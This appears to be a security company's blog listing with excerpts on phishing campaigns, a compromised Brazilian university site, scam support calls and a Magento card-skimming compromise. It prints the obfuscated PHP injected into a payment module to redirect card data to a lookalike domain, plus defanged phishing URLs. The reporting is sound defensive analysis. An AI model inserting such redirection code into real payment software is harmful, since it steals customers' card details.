Phishing Emails to Install Malicious WordPress Plugins

When all else fails, the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!!

Over the weekend, a few of our clients received a very suspicious email telling them to download a new version of the popular “All in One SEO Pack” plugin for WordPress. What a win, right? It wasn’t just the plugin, but the Pro version too. To top it off, it was for Free!!! This is where the journey begins…

Happy Black Friday / Cyber Monday


Read More

Joomla Hacks – Part I – Phishing

Joomla is a very popular open source CMS, dominating approximately 10% of the website market. While great for them, horrible for many others, as being popular often paints a big target on your back, at least when it comes to CMS applications.

Lately though, Joomla has had a bad spell, in which a vulnerability was found that was allowing for arbitrary PHP uploads via core. Any site that is not properly updated (or patched), can be an easily compromised. This applies to any website running Joomla 1.0.x, 1.5.x and the 1.6 and 1.7 branches, each one needs to be updated to the supported 2.5 or 3.0. Once that is supported, they need to be updated again to the latest 3.1.5 or 2.5.14 versions.

Unfortunately for Joomla users, the upgrade path is perhaps its weakest link. The reverse compatibility issues are so severe in the various branches that it plays right into the attackers objectives facilitating sever vulnerabilities, allowing them to have wider impacts across the website ecosystem. Because of this, we will share in this post one very specific method attackers are using to perform nefarious acts using the websites you visit or own, a little something known as Phishing.

  • Part I – Phishing injection


Read More

Phishing 2.0 – Credit Card Redirection on Compromised Sites

We have seen it all when it comes to compromised sites: from silly defacements, to malware, spam, phishing and all sorts of injections. However, the bad guys are always looking to maximize their profits when they hack a site. Especially when it is an e-commerce site that processes credit cards online.

Credit Card Redirection

A new trick we are seeing being used on compromised e-commerce sites is credit card redirection. The attackers modify the flow of the payment process so that instead of just processing the card, they redirect all payment details to a domain they own so they can steal the card details.

This is often done very stealthy, with minimal changes to the site. Credit cards are very valuable in the black market, so the attackers try to stay on as long as possible without being detected.

Magento Redirection

Because of the nature of Magento websites, they are a big target. We are seeing sites having the credit card processing file modified to either email the credit card details or redirect them to a new domain. In this specific case, the file “app/code/community/MageBase/DpsPaymentExpress/Model/Method/Pxpay.php” (use for PaymentExpress payment handling) was modified with this code:

$oo = base64_decode(‘cGF5bWVudGV4cHJlc3M=’); $_oo = base64_decode("cGF5bWVudGlleHByZXNz’);$_is = base64_decode("c2Vzc19pZA==’);
$_oi = base64_decode("cHJlZ19yZXBsYWNl’);
$responseURI = $_oi(‘/’.$oo.’/',$_oo,strval($responseXml->URI));

Which once decoded, replaces every occurrence of paymentexpress for paymentiexpress (see extra i). This forces the payment processing to be tunneled here:

https://sec.paymentiexpress.com/pxpay/pxaccess.aspx (see the i again)

Instead of the real URL:

https://sec.paymentexpress.com/pxpay/pxaccess.aspx

This redirection forces all the transaction data, including credit card details (name, address, CC and CVV), through their malicious server, in turn allowing the data to be stolen by the bad guys.

Paymentiexpress.com Phishing

The domain paymentiexpress.com was just registered a few days ago using whois privacy:

Registration Service Provided By: Namecheap.com
Contact: support@namecheap.com
Visit: http://namecheap.com
Registered through: eNom, Inc.
Creation date: 18 Jul 2013 18:02:00
Expiration date: 18 Jul 2014 18:02:00

And is currently live and not blacklisted by anyone (except us now). It has a proper SSL certificate (by RapidSSL) and everything that makes a trusted worthy phishing page.

What is also interesting is this new evolution of phishing, so that instead of tricking users into clicking into a bad url, it tricks the site itself to redirect the users information there.

UNICAMP – Used to Host Phishing Pages

We just discovered that UNICAMP (Universidade Estadual de Campinas), a renowned Brazilian University, has had their infrastructure compromised and it is being used to host phishing link which are then being used email spear phishing campaigns.

In this specific campaign they appear to be targeting a visitors credit card information. We came across the issue while working on an infected site. The attacker had modified the site’s .htaccess to redirect incoming traffic to the Phishing files:

hxxp://www.cpa.unicamp.br/alcscens/as/public.php (The URL was slightly modified to avoid accidental clicks)

This link was leading to the following URL which is still live. The content looks to have been cleared up:

hxxp://www0.comprapremiadacielo.web-maker.kz/

This was a phishing page pretending to be from Cielo, one of the biggest electronic payments operators in Brazil. It was pretending to offer promotions and discounts that requested the visitors credit card information.

Here’s an image of the phishing page:

cielo-phishing

We also found a file containing an email message and script to send emails to potential victims. Here’s the content of the email file:

httx://www. cpa.unicamp.br/alcscens/as/public.phpios%20autenticado&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2%2cor.r_gc.r_pw.%2ccf.osb&fp=aa151a29d476e27c&pf=p&pdl=500
Caso não esteja vendo as imagens desse e-mail, click aqui: http://www.cpa.unicamp.br/alcscens/as/public.php

While there does not appear to be any evidence of other nefarious activities on the site, it is still best practice to avoid the site until the University has an opportunity to clean themselves up.


Written by Magno Logan and Fio.

Dealing with WordPress Malware

A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections, it was released yesterday, and it couldn’t have been at a better time. If any one attended WordCamp Las Vegas you might even find some similarities. Fortunately in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.

WordPress Malware
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.

**Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.

Read More

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)


Read More

Phishing phone calls – Onlinesupport.com

It was early morning (around 8am) and I received a phone call from someone asking for me by name (using a private number and with a strong Indian accent):

Caller: Hello, Can I speak with XX?” (my real name)

Me: Sure, it is me.

Caller: Hello, I am calling from Online Support because there are some serious warnings coming from our Windows Server saying that your computer is compromised.

Me: Wow, it is?

At this point I was aware of what wass going on. This group from India has been calling thousands of numbers scaring people that their computer is compromised and convincing them to buy their service or install their software.

Read More

Chase phishing – case study

Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:

Your account was reported to us by Google for malicious content and has been deactivated.

We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; The file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.

Nothing really unusual as we see this many times a day.

However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…

When we looked at the content, it had 3 files:

Read More